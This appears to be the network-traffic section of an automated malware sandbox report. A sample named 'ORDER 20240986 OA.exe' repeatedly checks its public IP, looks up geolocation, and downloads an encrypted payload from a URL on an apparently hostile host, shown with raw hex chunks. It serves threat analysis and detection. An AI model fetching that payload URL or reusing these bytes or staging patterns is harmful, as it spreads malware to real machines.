                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Request-ID: 1dfa88db75363cca64b13c957669afd0
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                1192.168.2.449812158.101.44.242807832C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 21, 2024 09:01:30.865945101 CET127OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Nov 21, 2024 09:01:32.249574900 CET320INHTTP/1.1 200 OK
                                                                                                                                                Date: Thu, 21 Nov 2024 08:01:32 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 103
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Request-ID: 657e2f63e9577a27ba775cf16a32bdee
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                2192.168.2.449819158.101.44.242807832C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 21, 2024 09:01:34.085762024 CET151OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Nov 21, 2024 09:01:35.369781017 CET320INHTTP/1.1 200 OK
                                                                                                                                                Date: Thu, 21 Nov 2024 08:01:35 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 103
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Request-ID: c24cc36d2d4c7a065b8532ab1fd57d77
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                3192.168.2.449829158.101.44.242807832C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 21, 2024 09:01:37.154551029 CET151OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Nov 21, 2024 09:01:38.386790037 CET320INHTTP/1.1 200 OK
                                                                                                                                                Date: Thu, 21 Nov 2024 08:01:38 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 103
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Request-ID: 997624889b477d1586a2d0cbbe7b29a0
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                4192.168.2.449838158.101.44.242807832C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 21, 2024 09:01:40.226825953 CET151OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Nov 21, 2024 09:01:41.537235022 CET320INHTTP/1.1 200 OK
                                                                                                                                                Date: Thu, 21 Nov 2024 08:01:41 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 103
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Request-ID: 2a1006da77cf733cdde265a41f502072
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                5192.168.2.449846158.101.44.242807832C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 21, 2024 09:01:43.372589111 CET151OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Nov 21, 2024 09:01:44.709273100 CET320INHTTP/1.1 200 OK
                                                                                                                                                Date: Thu, 21 Nov 2024 08:01:44 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 103
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Request-ID: 17feef057aa3ebccf22627403fcf9466
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                6192.168.2.449857158.101.44.242807832C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 21, 2024 09:01:46.547331095 CET151OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Nov 21, 2024 09:01:47.779884100 CET320INHTTP/1.1 200 OK
                                                                                                                                                Date: Thu, 21 Nov 2024 08:01:47 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 103
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Request-ID: f4c3fbe7126488eac4704860a0671747
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                7192.168.2.449864158.101.44.242807832C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 21, 2024 09:01:49.675864935 CET151OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Nov 21, 2024 09:01:51.852545977 CET320INHTTP/1.1 200 OK
                                                                                                                                                Date: Thu, 21 Nov 2024 08:01:51 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 103
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Request-ID: 4416086230c58ea9f8ef6fe4292ec5aa
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                0192.168.2.449783167.250.5.914437832C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-11-21 08:01:21 UTC187OUTGET /yak/ZnWGURK2.bin HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                Host: sierrassinfinusadas.com.ar
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                2024-11-21 08:01:22 UTC222INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Thu, 21 Nov 2024 08:01:21 GMT
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Content-Length: 277568
                                                                                                                                                Connection: close
                                                                                                                                                Last-Modified: Wed, 20 Nov 2024 04:05:40 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                2024-11-21 08:01:22 UTC16162INData Raw: b9 fa df d8 82 92 a5 fd 09 0d 4e fc 23 f7 5d e8 00 d9 05 3b e2 2f 27 d3 89 00 4a 6a 9f c3 25 1e 66 b3 9d 5f 74 66 0e 8e f3 2c df 51 62 cf 96 2d cd 23 12 3b 80 c2 87 0e 71 05 ea 6d 7c b0 32 62 a3 95 99 32 f0 5d c1 03 3b 37 7f 94 83 b4 8f 89 3c 03 c0 35 96 c2 97 8c 8e fe a9 b0 10 14 0b ec 33 c8 cf c9 2e 68 c8 0e 12 df 90 b9 4c c9 9f a7 ef 57 f2 11 f3 47 fb 9c 35 9b 49 40 aa b9 69 13 90 83 15 fe c2 c5 78 31 2c be d2 f1 7a 4d b6 1c c8 7f 79 92 df 1d a2 3f f3 58 08 88 58 a4 0f 55 e3 5d 25 92 e3 b1 80 32 4e 46 33 74 77 a4 69 76 49 50 aa df 6b af bc d2 99 8b c7 44 49 7a 8e f8 bb a2 01 8c 2e 07 a2 4f 6b f9 93 ac bc 5e 8c e4 02 2a e5 56 ab 89 01 c8 24 23 24 ac 19 05 a7 90 ce d9 85 e7 d7 84 e1 49 96 18 ff bc 9c e8 26 26 6d 64 37 90 56 6f f1 b7 1c 37 eb df 5d ce 8f
                                                                                                                                                Data Ascii: N#];/'Jj%f_tf,Qb-#;qm|2b2];7<53.hLWG5I@ix1,zMy?XXU]%2NF3twivIPkDIz.Ok^*V$#$I&&md7Vo7]
                                                                                                                                                2024-11-21 08:01:22 UTC16384INData Raw: 58 bf 8f ff 90 45 76 a1 45 fc 8b 0e 4d 42 87 a0 55 0e f3 51 f9 0f e6 30 ec f3 ce 18 61 c6 f6 e7 2d 19 b8 74 ed ca 5f a5 9b 54 54 da 9d 21 dd 83 d3 95 4c 08 78 9d f4 b1 6d 99 52 6b b5 ab 8b da df 0e 73 68 f0 13 f8 fa 52 7b d1 c1 7c c4 06 0c 97 af a9 b8 60 fb 00 59 16 f7 d5 c2 c9 d4 65 cd 91 68 70 20 fd be b0 1a e6 c4 c8 51 8c 7b f3 f1 be 55 ba bd b4 e0 ca c9 35 eb ba 63 5c 5d c3 14 00 99 01 25 ad b2 77 d3 e2 c0 5a 5f f4 24 68 b8 32 b2 83 ec 41 cf 45 e0 18 79 74 fc 5f 50 6c 5c 2e c6 48 5d 6d b2 e4 a5 7a 62 c0 c8 a9 1c 59 b4 1e 4b 2b c6 11 19 44 60 61 21 1d 01 8b b7 a0 57 bb 0d 3a e4 89 d6 38 70 38 bf ca af fc 9e 39 49 01 3b df 34 b7 2f ca 48 c4 dd 17 e1 8e f8 a6 29 fb 3f fc 98 e7 cb d5 cc 26 aa 8e a3 0c 06 25 97 f5 96 ee 89 e8 c5 5b a6 bd 97 fa 02 03 3b 9b
                                                                                                                                                Data Ascii: XEvEMBUQ0a-t_TT!LxmRkshR{|`Yehp Q{U5c\]%wZ_$h2AEyt_Pl\.H]mzbYK+D`a!W:8p89I;4/H)?&%[;
                                                                                                                                                2024-11-21 08:01:22 UTC16384INData Raw: ca 1e 46 d4 0d 40 d7 cf 52 46 b8 5c 68 fe 68 f6 5e c0 6b 74 ee d6 e7 6e 49 77 7e 71 a4 bb d3 b0 c1 51 2f bc 37 c3 24 68 85 f5 6f e4 d7 64 d8 16 54 d1 ce 5c 20 78 ed bf 35 67 d4 38 d5 d9 64 fd 6f 3b 30 7d b2 9d b9 32 e1 a9 41 ad 12 a6 a4 b2 cc 16 35 c7 c2 57 f3 a0 05 90 58 68 6d 85 c8 81 c9 b5 68 4b 9c 81 13 ab b8 18 f2 6a 4c fd 77 21 68 d4 29 b4 89 2c 99 3b 10 34 aa f3 62 4b 23 eb e2 c0 b8 34 50 16 0b 89 89 2a 88 03 7c 66 69 a3 83 e5 25 4a 35 d2 4f 7b 2f 51 ff 57 b4 40 13 92 e1 6f 3c 0b 7b 2b 72 87 99 f2 4a eb 6a ce 12 e3 8b 75 1b de 13 d6 97 16 1a c9 f2 bc 7d ea f9 65 02 05 ca ca a2 0f b1 3d a8 91 27 56 00 2a c2 89 af 53 9f 3d bf 4c 77 bc 3e 74 e9 dd 53 7b c0 6f b8 ce 95 e9 89 34 09 1d da 40 01 fb 3a 55 c8 ca 4f 5b 43 3b 79 0f 4e aa f0 7c 11 6d 38 d8 12
                                                                                                                                                Data Ascii: F@RF\hh^ktnIw~qQ/7$hodT\ x5g8do;0}2A5WXhmhKjLw!h),;4bK#4P*|fi%J5O{/QW@o<{+rJju}e='V*S=Lw>tS{o4@:UO[C;yN|m8
                                                                                                                                                2024-11-21 08:01:22 UTC16384INData Raw: 04 08 53 cc c1 28 fd dc 6f 33 1f 4d 66 b9 97 ce 57 83 cd c1 11 23 df f9 44 e6 9f b3 85 de 2a 4e bf 92 7a a9 d8 5d 5b ee 66 b4 4a ec 0f 07 56 f0 25 67 f8 29 9a d3 e8 d2 8f 90 2d c2 84 43 3d 9c b5 04 5b 45 ad 3b fa d6 9b bb 38 70 6b 7d 45 1a dc fd 9a 8e 59 9d 95 17 ca 38 92 cd eb 3f ce f8 1f 58 e4 d5 79 2c 29 7a 31 07 5c a1 68 c8 bd a1 5e 58 1a e0 fb 05 32 06 1d 6f 0a 2f a0 08 c7 5d b7 9a 84 10 22 50 ab 3f 95 cd ff 4d 44 9e a6 77 1f e8 13 7a 29 b1 40 83 da d3 18 67 ff e1 fb a0 53 ab 7d fd e9 61 c5 aa 42 52 b9 34 15 c1 87 5c e7 c7 37 da c8 c4 23 32 96 54 33 5b 8e 92 ae cf 1d 71 6c 54 25 ee 99 6f 6c 2f b2 cd ec 0c 7f 9b b9 81 48 c2 de 16 3a 2f 8e 89 b2 6b f6 01 c1 b9 76 79 08 4e ad b6 10 e1 ab bf 44 8c 59 0b f9 b4 74 ab bd f1 bc d9 f9 3b c3 fb 61 5c 5b cf 12
                                                                                                                                                Data Ascii: S(o3MfW#D*Nz][fJV%g)-C=[E;8pk}EY8?Xy,)z1\h^X2o/]"P?MDwz)@gS}aBR4\7#2T3[qlT%ol/H:/kvyNDYt;a\[
                                                                                                                                                2024-11-21 08:01:22 UTC16384INData Raw: ba 93 ba 19 63 8f 38 72 d5 5e b3 49 d4 0a d1 58 f3 84 67 9e f6 00 47 db 4f cf 05 ee c2 8f fc ed a1 62 36 17 70 43 55 8e bb 34 da 60 4f cb 50 0d 1b d1 84 30 20 fa 21 d5 ff b0 97 9d ad 82 db 58 19 81 59 ca 8a f9 aa 51 ca 51 cd aa 3c d1 90 a9 1f 65 82 a5 0b ec 87 06 a0 e5 eb 9a fe 18 65 7a cc 12 56 4e 60 c7 c3 1d 21 a6 cf a2 d5 d9 c9 e3 0d 87 a9 6c a9 78 e7 f5 c7 1c 50 28 61 4a 29 d5 14 c6 f7 25 09 d3 cf 58 25 ac 5a be 9d 1c 35 59 d1 67 25 84 28 18 9b 49 09 9c 61 81 97 94 79 c1 5b 36 a1 38 95 77 68 85 fb c3 71 d5 4e a8 41 60 50 ce 5c 2a 6e 13 ad 26 77 c5 56 f8 d5 75 63 79 54 fa 6d b2 97 b9 77 ca a2 40 a7 2d b5 cb db cd 16 3f fd c2 46 ed de 24 8c 70 7e 44 4e c2 f3 78 80 a4 3b b4 c2 13 ba bd 6c c8 6c 64 ef 08 1a 62 df 2a fe 58 2d 99 31 79 8a 81 f1 68 4d 3e ec
                                                                                                                                                Data Ascii: c8r^IXgGOb6pCU4`OP0 !XYQQ<eezVN`!lxP(aJ)%X%Z5Yg%(Iay[68whqNA`P\*n&wVucyTmw@-?F$p~DNx;lldb*X-1yhM>
                                                                                                                                                2024-11-21 08:01:22 UTC16384INData Raw: 41 d5 50 23 aa 04 c6 5a a4 7f c4 74 f6 18 33 63 fe c0 6e 90 8c c8 c2 5a bb 49 96 f5 e1 fb 8c d8 69 dc 77 ca f6 14 7b 14 c9 b6 87 15 ee 83 c8 62 ff cd 3f 3e 7f 79 04 06 b1 b3 c9 f7 6e 46 70 27 c8 6a a7 4f a5 6a 91 40 99 cb 89 55 b6 96 81 2c 5d b5 b2 dc a6 7f 7d b5 d8 83 be e6 b4 95 0a 4f e1 69 76 c0 05 fa a0 d3 98 70 60 30 90 96 ce c2 7e 5e 5f 44 1c 74 4c ab 97 a1 44 30 08 73 7d 74 66 6e fe c5 2e 5e d5 00 14 24 4d 60 bf 4d c2 4e bd cc c6 29 a3 ad d8 71 ee fe 9d be 8d 0c 44 c5 fd 55 83 ce 5a 56 ec 7c b5 01 20 7f 07 26 99 7f 4e fa 2f 8f db e9 d2 e4 b7 2d c2 fd 4d be 9c b3 28 45 d4 89 28 fe a2 d6 60 2b 07 6b 46 cc 22 fc f6 8c 70 52 d3 8e 62 9a 19 be fd 9f 9b 8c f8 19 54 c9 d2 03 0d 00 5c 41 d5 16 9f 63 6a 9e aa 28 3e 2c e8 f9 fa 31 1f 7c 04 81 08 ba 7c 56 7f
                                                                                                                                                Data Ascii: AP#Zt3cnZIiw{b?>ynFp'jOj@U,]}Oivp`0~^_DtLD0s}tfn.^$M`MN)qDUZV| &N/-M(E(`+kF"pRbT\Acj(>,1||V
                                                                                                                                                2024-11-21 08:01:22 UTC16384INData Raw: 3e 3c 52 31 13 9f 2e 46 ac a3 96 f4 a0 9a e8 b2 c0 7c 55 b2 e5 05 3b 9a 0e cf 58 3e a6 5c e6 e7 af 98 23 8e 67 22 9b d4 bd 08 e6 da 9a 59 32 c8 b5 7f cc cc db d5 37 5e 06 e0 f3 cb e1 ad b8 4f 15 47 9a 08 52 93 00 60 55 e6 62 74 46 9c 55 02 f4 bd 77 6a 29 0d 44 e2 c9 3b 46 51 ed 86 29 af 70 47 d4 16 51 74 67 0d 8e dc b2 28 63 cc 7c 28 e9 19 c8 7a 50 a3 c6 4b 2d 77 51 8d 8c 33 93 a0 bf ae 12 11 d3 2a 77 a5 48 9b e3 f4 0a f3 ba 0d 87 7c 92 95 5d 34 f0 79 d9 5d 00 eb 8d f6 fd 30 3d 69 06 7f 19 19 8d bb 42 df 4d ce da 54 75 57 2e 87 1f 25 de b1 d9 d3 f7 9c ee ee 93 de 2b 66 96 2b 9c c6 d1 5b f3 ef 4c d2 f6 1a 96 f1 fb 41 69 de 4a 33 78 d6 02 02 c1 d4 fe f2 0b 5b 0a 1e 95 68 48 6c c7 c3 19 21 e8 ae a2 d5 d9 c4 8f 1c 83 01 5a be 74 1c b3 c7 68 e3 00 52 12 2c 77
                                                                                                                                                Data Ascii: ><R1.F|U;X>\#g"Y27^OGR`UbtFUwj)D;FQ)pGQtg(c|(zPK-wQ3*wH|]4y]0=iBMTuW.%+f+[LAiJ3x[hHl!ZthR,w
                                                                                                                                                2024-11-21 08:01:22 UTC16384INData Raw: 4e 73 8c fe f3 4a 16 4c e1 d4 16 bf fa e3 fe c3 28 89 c3 78 00 fc 68 5b b1 84 1f 88 f2 a3 fe ab 69 f7 cf ca 2c c5 fa 9e 79 04 a5 b0 1c 60 31 4e c0 66 41 b0 7e 1a fd 76 4e 0b 73 5c 67 aa 5c 0d c1 bc f1 3a 60 6f 58 4e 81 fb ae e0 78 48 b9 13 d6 bc 87 1c 4f 11 f5 f9 a0 c0 d6 8a 14 08 de c1 de 44 e6 71 98 ed 2b 41 d5 6a a9 cd 48 a7 68 83 e8 d1 23 95 07 dc 6b 6a 43 66 a4 69 2f 70 b0 4b c7 bf 28 dd 5c c3 28 f4 fe e0 04 e0 34 b2 63 ef cc 6f b8 9c 91 c0 54 bb 44 84 d5 03 89 33 d8 69 03 42 f9 ac 04 d5 14 b3 07 ab 02 cf 43 ed 7a 87 02 92 3e 25 db 20 0f a0 b7 6b d2 67 34 91 57 c8 0a 40 6a be 7a 8f d2 b8 d7 14 d7 91 96 cd 8e 75 d1 b2 c3 b0 44 66 ca fb 89 cc 88 f8 9c 52 2e a8 69 7c 4a 2c fa a6 ff 8e 71 71 3d 8c 47 e4 7c 6f 59 4e 44 51 1f b1 54 6e ad 4c 9c 69 27 55 30
                                                                                                                                                Data Ascii: NsJL(xh[i,y`1NfA~vNs\g\:`oXNxHODq+AjHh#kjCfi/pK(\(4coTD3iBCz>% kg4W@jzuDfR.i|J,qq=G|oYNDQTnLi'U0
                                                                                                                                                2024-11-21 08:01:22 UTC16384INData Raw: 79 05 77 e3 d9 7e 67 c5 22 6e e2 c4 30 1a 8e 81 a5 96 ad f1 d5 f8 61 16 86 64 03 47 35 a3 42 ff 25 b2 db f5 13 15 ab 04 c0 ac 6e 87 7d 8b 24 18 b8 db 49 73 71 c0 3d b2 db 7a 79 98 5b b7 ea fd bb 8a a0 fd f1 07 3f 24 6a b4 0e 4b 52 11 82 63 62 ad 9f b0 f2 d5 25 fc c2 40 5d d7 d7 9d d9 0b d6 7c cc 13 a4 b0 cc 3f f0 9c c9 83 9f 20 06 f7 6c e7 8d 0c 0e d5 d2 b8 b7 c9 af 1e 64 a2 b9 69 9c 77 20 0d e7 18 58 c8 a1 3c cc c7 39 cd ab d9 69 f0 e5 08 32 b9 cd 61 96 f8 16 d5 51 ee fc bb e2 50 ea 67 52 f0 ec b7 20 a9 c9 9e 5b a3 ed c7 54 8e cc ab ab 18 4b d0 f5 e6 df f6 b9 95 63 7a b8 63 e4 5a 82 d6 5c 33 c8 7e 6e 47 96 4c 64 ef 94 15 60 46 1b 9b e2 c3 39 55 52 fd 80 3a a6 61 5d c0 22 8d 67 7d 59 84 ca 4d 32 40 c3 6d cc c5 0f e0 b2 50 a3 dd 5a 37 04 25 9f 8d 39 88 db
                                                                                                                                                Data Ascii: yw~g"n0adG5B%n}$Isq=zy[?$jKRcb%@]|? ldiw X<9i2aQPgR [TKczcZ\3~nGLd`F9UR:a]"g}YM2@mPZ7%9
                                                                                                                                                2024-11-21 08:01:22 UTC16384INData Raw: 32 7a 69 22 43 fa 45 a2 b0 fd ab f9 75 8d 49 0a 2c dd fc ee a3 a9 7a 74 8a e2 b2 0c a1 ef a5 4f 88 46 27 30 97 59 97 89 73 6b 0a 39 65 a9 bb 06 bf e2 4c ea 85 97 75 ac 94 49 b8 56 e8 b5 e2 e9 26 26 69 15 3a b8 1f 6f b1 bd 9c 36 eb df 59 cc 8f 7f 57 cc 71 ee 0c 64 eb b0 01 46 1f 32 06 df 6f ec 9c f5 23 88 a2 26 6a 67 29 77 16 ea 03 6f 79 28 04 f7 de f4 96 29 b5 02 d4 07 af 16 ff 0d 72 9c b1 f9 4a 11 7f c7 d1 16 a9 f0 e4 c7 70 28 89 d2 7e 6c cb 42 49 b6 88 1d 88 71 d5 fe ab 2e 98 cd ca 20 e9 f2 f7 76 10 a4 b6 01 b1 25 71 30 75 46 88 cf 69 d6 74 46 1c 78 26 71 eb 87 7d de fa d5 38 66 64 76 57 e9 ae c0 4c 7e 2f 0c 29 d2 aa 92 08 73 ae e4 fe d2 b6 6b 8d 16 03 5b c3 ae 2d dc 76 91 99 7c 48 c4 1d cd 9b 65 a7 18 e6 d7 2d 20 82 10 ab 39 7a 44 64 45 9a ae 00 df 68
                                                                                                                                                Data Ascii: 2zi"CEuI,ztOF'0Ysk9eLuIV&&i:o6YWqdF2o#&jg)woy()rJp(~lBIq. v%q0uFitFx&q}8fdvWL~/)sk[-v|He- 9zDdEh


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                1192.168.2.449800188.114.96.34437832C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-11-21 08:01:28 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-11-21 08:01:28 UTC849INHTTP/1.1 200 OK
                                                                                                                                                Date: Thu, 21 Nov 2024 08:01:28 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 361
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                Age: 139997
                                                                                                                                                Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kckc4M4VVB3c%2FZ1dqOJrOBY23g2WAFL3NNO600NqaWzXSEG0lug5pf8ybu1P2KFcDKh8tWqmjlyzpbC1pkN6FK3csW6M70f6m1QFvVf8JEg4HzUqbv1LzMbx6M6lBGQ%2BCUD6fSXK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e5f26e8fefc42a3-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
